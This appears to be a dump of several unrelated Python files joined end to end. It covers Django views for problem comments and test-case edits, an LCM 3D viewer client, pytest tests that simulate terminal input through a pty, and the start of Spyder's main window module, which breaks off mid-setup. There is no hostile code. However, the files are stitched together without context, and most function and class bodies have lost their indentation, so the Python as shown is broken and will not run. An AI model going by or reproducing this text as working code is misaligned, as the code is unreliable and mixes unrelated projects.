'''
function to list out the problem comments
'''
@login_required(login_url='/users/login')
def comments(request):
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, not problem.doesBelongToContest):
return render(request, 'accessDenied.html', {})
problemComments = ProblemComment.objects.filter(problem=problem)
objectName = ""
objectId = 0
if problem.doesBelongToContest:
objectName = "contestId"
objectId = problem.contest.contestId
else:
objectName = "labId"
objectId = problem.lab.labId
return render(request, 'problem/commentsList.html',
{'comments': problemComments, 'pid': pid, 'problem': problem, 'objectName': objectName,
'objectId': objectId})
'''
function to create the problem comments
'''
@login_required(login_url='/users/login')
def commentCreate(request):
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, not problem.doesBelongToContest):
return render(request, 'accessDenied.html', {})
comment = request.POST["comment"]
user = request.user
newComment = ProblemComment(comment=comment, user=user, problem=problem)
newComment.save()
return redirect('/problems/comments/?pid' + "=" + pid)
@faculty_required()
def testEdit(request):
result, tid, testCase = getTestCase(request)
if not result:
return render(request, '404.html', {})
else:
if not customRoleBasedTestProblemAuthorization(request, testCase.problem):
return render(request, 'accessDenied.html', {})
input = request.POST.get("input")
output = request.POST.get("output")
input = input.replace('\r', '')
output = output.replace('\r', '')
fpInput = open(os.path.join(settings.BASE_DIR, testCase.inputFile.url[1:]), "w")
fpInput.write(input)
fpInput.close()
fpOutput = open(os.path.join(settings.BASE_DIR, testCase.outputFile.url[1:]), "w")
fpOutput.write(output)
fpOutput.close()
reEvaluateSubmissions(request, testCase.problem.problemId)
return redirect('/problems/tests/?pid=' + str(testCase.problem.problemId))
|
viewerclient.py
|
from __future__ import absolute_import, division, print_function
import time
import json
import os
import tempfile
import threading
from collections import defaultdict
try:
    from collections.abc import Iterable
except ImportError:  # Python 2 fallback
    from collections import Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = json.dumps(data)
msg.num_bytes = len(msg.data)
return msg
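# The JSON payload carried in msg.data is built by CoreVisualizer.serialize_queue()
# below; as a rough sketch it looks like:
#
#     {
#         "utime": <int microseconds>,
#         "delete": [{"path": [...]}, ...],
#         "setgeometry": [{"path": [...], "geometries": [...]}, ...],
#         "settransform": [{"path": [...], "transform": {"translation": [...],
#                                                         "quaternion": [...]}}, ...]
#     }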
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform))
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1., 1., 1., 1.), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1,1,1]):
self.lengths = lengths
def serialize(self):
return {
"type": "box",
"lengths": list(self.lengths)
}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {
"type": "sphere",
"radius": self.radius
}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1,1,1]):
self.radii = radii
def serialize(self):
return {
"type": "ellipsoid",
"radii": list(self.radii)
}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {
"type": "cylinder",
"length": self.length,
"radius": self.radius
}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {
"type": "triad",
"scale": self.scale,
"tube": self.tube
}
class PolyLine(BaseGeometry):
def __init__(self, points, radius=0.01, closed=False,
start_head=False, end_head=False,
head_radius=0.05, head_length=None):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": self.points,
"radius": self.radius,
"closed": self.closed
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in self.children.items():
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
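    # For example, after touching tree["a"]["b"] and tree["c"], descendants()
    # returns [("a",), ("a", "b"), ("c",)] (ordering follows dict insertion order).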
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,),
lcm=self.core.lcm,
core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
self.publish_immediately = True
self.lcm.subscribe(self._response_channel(),
self._handle_response)
self.handler_thread = None
def _request_channel(self):
return "DIRECTOR_TREE_VIEWER_REQUEST_<{:s}>".format(self.client_id)
def _response_channel(self):
return "DIRECTOR_TREE_VIEWER_RESPONSE_<{:s}>".format(self.client_id)
def _handler_loop(self):
while True:
self.lcm.handle()
def start_handler(self):
if self.handler_thread is not None:
return
self.handler_thread = threading.Thread(
target=self._handler_loop)
self.handler_thread.daemon = True
self.handler_thread.start()
def _handle_response(self, channel, msgdata):
msg = viewer2_comms_t.decode(msgdata)
data = json.loads(msg.data)
if data["status"] == 0:
pass
elif data["status"] == 1:
for path in self.tree.descendants():
self.queue.setgeometry.add(path)
self.queue.settransform.add(path)
else:
raise ValueError(
"Unhandled response from viewer: {}".format(msg.data))
def setgeometry(self, path, geomdata):
if isinstance(geomdata, BaseGeometry):
self._load(path, [GeometryData(geomdata)])
elif isinstance(geomdata, Iterable):
self._load(path, geomdata)
else:
self._load(path, [geomdata])
def _load(self, path, geoms):
converted_geom_data = []
for geom in geoms:
if isinstance(geom, GeometryData):
converted_geom_data.append(geom)
else:
converted_geom_data.append(GeometryData(geom))
self.tree.getdescendant(path).geometries = converted_geom_data
self.queue.setgeometry.add(path)
self._maybe_publish()
def settransform(self, path, tform):
self.tree.getdescendant(path).transform = tform
self.queue.settransform.add(path)
self._maybe_publish()
def delete(self, path):
if not path:
self.tree = LazyTree()
else:
t = self.tree.getdescendant(path[:-1])
if path[-1] in t.children:
del t.children[path[-1]]
self.queue.delete.add(path)
self._maybe_publish()
def _maybe_publish(self):
if self.publish_immediately:
self.publish()
def publish(self):
if not self.queue.isempty():
data = self.serialize_queue()
msg = to_lcm(data)
self.lcm.publish(self._request_channel(), msg.encode())
self.queue.empty()
def serialize_queue(self):
delete = []
setgeometry = []
settransform = []
for path in self.queue.delete:
delete.append({"path": path})
for path in self.queue.setgeometry:
geoms = self.tree.getdescendant(path).geometries or []
setgeometry.append({
"path": path,
"geometries": [geom.serialize() for geom in geoms]
})
for path in self.queue.settransform:
settransform.append({
"path": path,
"transform": serialize_transform(
self.tree.getdescendant(path).transform)
})
return {
"utime": int(time.time() * 1e6),
"delete": delete,
"setgeometry": setgeometry,
"settransform": settransform
}
if __name__ == '__main__':
# We can provide an initial path if we want
vis = Visualizer(path="/root/folder1")
# Start a thread to handle responses from the viewer. Doing this enables
# the automatic reloading of missing geometry if the viewer is restarted.
vis.start_handler()
vis["boxes"].setgeometry(
[GeometryData(Box([1, 1, 1]),
color=np.random.rand(4),
transform=transformations.translation_matrix([x, -2, 0]))
for x in range(10)])
# Index into the visualizer to get a sub-tree. vis.__getitem__ is lazily
# implemented, so these sub-visualizers come into being as soon as they're
# asked for
vis = vis["group1"]
box_vis = vis["box"]
sphere_vis = vis["sphere"]
box = Box([1, 1, 1])
geom = GeometryData(box, color=[0, 1, 0, 0.5])
box_vis.setgeometry(geom)
sphere_vis.setgeometry(Sphere(0.5))
sphere_vis.settransform(transformations.translation_matrix([1, 0, 0]))
vis["test"].setgeometry(Triad())
vis["test"].settransform(transformations.concatenate_matrices(
transformations.rotation_matrix(1.0, [0, 0, 1]),
transformations.translation_matrix([-1, 0, 1])))
vis["triad"].setgeometry(Triad())
# Setting the geometry preserves the transform at that path.
# Call settransform(np.eye(4)) if you want to clear the transform.
vis["test"].setgeometry(Triad())
# bug, the sphere is loaded and replaces the previous
# geometry but it is not drawn with the correct color mode
vis["test"].setgeometry(Sphere(0.5))
for theta in np.linspace(0, 2 * np.pi, 100):
vis.settransform(transformations.rotation_matrix(theta, [0, 0, 1]))
time.sleep(0.01)
#vis.delete()
|
test_utils.py
|
import logging
import sys
import threading
import time
import pytest
from ophyd import Component as Cpt
from ophyd import Device
from .. import utils
from ..device import GroupDevice
from ..utils import post_ophyds_to_elog
try:
import pty
except ImportError:
pty = None
logger = logging.getLogger(__name__)
pty_missing = "Fails on Windows, pty not supported in Windows Python."
@pytest.fixture(scope='function')
def sim_input(monkeypatch):
master, slave = pty.openpty()
with open(slave, 'r') as fake_stdin:
with open(master, 'w') as sim_input:
monkeypatch.setattr(sys, 'stdin', fake_stdin)
yield sim_input
def input_later(sim_input, inp, delay=0.1):
def inner():
time.sleep(delay)
sim_input.write(inp)
threading.Thread(target=inner, args=()).start()
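# Usage sketch (mirrors the tests below): write to the master end of the pty so
# that utils.get_input(), reading from the patched sys.stdin, sees the data:
#
#     def test_example(sim_input):
#         input_later(sim_input, 'a\n', delay=0.1)   # background write
#         assert utils.get_input() == 'a'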
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
def test_is_input(sim_input):
logger.debug('test_is_input')
sim_input.write('a\n')
assert utils.is_input()
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(5)
def test_get_input_waits(sim_input):
logger.debug('test_get_input_waits')
input_later(sim_input, 'a\n', delay=2)
assert utils.get_input() == 'a'
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(0.5)
def test_get_input_arrow(sim_input):
logger.debug('test_get_input_arrow')
input_later(sim_input, utils.arrow_up + '\n')
assert utils.get_input() == utils.arrow_up
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(0.5)
def test_get_input_shift_arrow(sim_input):
    logger.debug('test_get_input_shift_arrow')
input_later(sim_input, utils.shift_arrow_up + '\n')
assert utils.get_input() == utils.shift_arrow_up
@pytest.mark.skipif(
sys.platform == "win32",
reason=pty_missing,
)
@pytest.mark.timeout(0.5)
def test_cbreak(sim_input):
logger.debug('test_cbreak')
# send the ctrl+c character
input_later(sim_input, '\x03\n')
assert utils.get_input() == '\n'
def test_get_status_value():
dummy_dictionary = {'dict1': {'dict2': {'value': 23}}}
res = utils.get_status_value(dummy_dictionary, 'dict1', 'dict2', 'value')
assert res == 23
res = utils.get_status_value(dummy_dictionary, 'dict1', 'dict2', 'blah')
assert res == 'N/A'
def test_get_status_float():
dummy_dictionary = {'dict1': {'dict2': {'value': 23.34343}}}
res = utils.get_status_float(dummy_dictionary, 'dict1', 'dict2', 'value')
assert res == '23.3434'
res = utils.get_status_float(dummy_dictionary, 'dict1', 'dict2', 'blah')
assert res == 'N/A'
res = utils.get_status_float(
dummy_dictionary, 'dict1', 'dict2', 'value', precision=3
)
assert res == '23.343'
class StatusDevice(Device):
""" simulate a device with a status method """
def status(self):
return self.name
class BasicGroup(StatusDevice, GroupDevice):
one = Cpt(StatusDevice, ':BASIC')
two = Cpt(StatusDevice, ':COMPLEX')
class SomeDevice(StatusDevice):
some = Cpt(StatusDevice, ':SOME')
where = Cpt(StatusDevice, ':WHERE')
def test_ophyd_to_elog(elog):
# make some devices
group = BasicGroup('GROUP', name='group')
some = SomeDevice('SOME', name='some')
post_ophyds_to_elog([group, some], hutch_elog=elog)
assert len(elog.posts) == 1
# count number of content entries
assert elog.posts[-1][0][0].count('<pre>') == 2
post_ophyds_to_elog([group.one, some.some], hutch_elog=elog)
assert len(elog.posts) == 1 # no children allowed by default
post_ophyds_to_elog([[group, some], group.one, some.some],
allow_child=True, hutch_elog=elog)
assert len(elog.posts) == 2
assert elog.posts[-1][0][0].count('<pre>') == 4
# two list levels
assert elog.posts[-1][0][0].count("class='parent'") == 2
# half-hearted html validation
for post in elog.posts:
for tag in ['pre', 'div', 'button']:
assert post[0][0].count('<'+tag) == post[0][0].count('</'+tag)
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import gc
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attribute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, running_under_pytest
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('Tellurium_splash.png'), 'png'))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __trouble_url_short__, get_versions)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
DEBUG, debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
from spyder.widgets.fileswitcher import FileSwitcher
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.open_project
self.window_title = options.window_title
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
                # Make spyder quit when pressing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Create our TEMPDIR
if not osp.isdir(programs.TEMPDIR):
os.mkdir(programs.TEMPDIR)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.not_active_path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
self.not_active_path, _x = \
encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = \
[name for name in self.not_active_path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.extconsole = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.fileswitcher = None
        # Check for updates Thread and Worker, references needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
from spyder.plugins.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, MainInterpreterConfigPage,
RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Set a shutdown QTimer when running under CI (TEST_CI_APP)
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute the actions that must be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None  # isFullScreen does not work as expected
# The following flag remembers the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See issue 4132
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
"""Debug prints"""
debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# File switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_fileswitcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_sc_to_tip=True)
